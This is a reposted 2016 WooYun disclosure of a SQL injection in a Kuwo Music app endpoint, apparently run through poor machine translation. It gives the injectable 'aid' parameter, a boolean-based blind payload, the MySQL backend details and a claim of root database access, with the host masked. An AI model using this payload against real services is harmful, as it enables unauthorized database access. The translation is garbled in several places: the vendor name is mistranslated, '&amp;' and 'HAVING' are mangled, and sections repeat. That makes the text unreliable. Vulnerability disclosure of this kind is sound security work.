酷我音乐APP另一处ROOT注入
漏洞标题 酷我音乐APP另一处ROOT注入 相关厂商 酷我音乐 漏洞作者 路人甲 提交时间 2016-04-30 09:35 公开时间 2016-06-16 19:40 漏洞类型 SQL注射漏洞 危害…
漏洞标题
冷却我的音乐应用程序另一个ROOT注入
相关制造商
kuwo音乐
漏洞作者
过路人
提交时间
2016-04-30 09: 35
公共时间
2016-06-16 19: 40
漏洞类型
SQL注入漏洞
危险等级
高
自我评估等级
15
漏洞状态
制造商已确认
标签标签
注入,Mysql
漏洞详细信息
*****;页=1&安培;援助=2078300&安培;在*****
注射点:援助
---
参数:辅助(GET)
输入:基于布尔值的盲
标题: AND基于布尔的盲 - WHERE或H * ING子句
有效载荷:来自=mb& page=1& aid=2078300)AND 6308=6308 AND(8401=8401& index=101913& uid=21259663
---
Web应用程序技术: JSP
后端DBMS: MySQL>=5.0.2
漏洞证明:
漏洞证明,当前用户,ROOT注入
修理计划:
过滤参数
版权声明:请注明出处。居民A @乌云
修理计划:
过滤参数
版权声明:请注明出处。居民A @乌云
- 发表于 2016-07-17 08:00
- 阅读 ( 719 )
- 分类:黑客技术
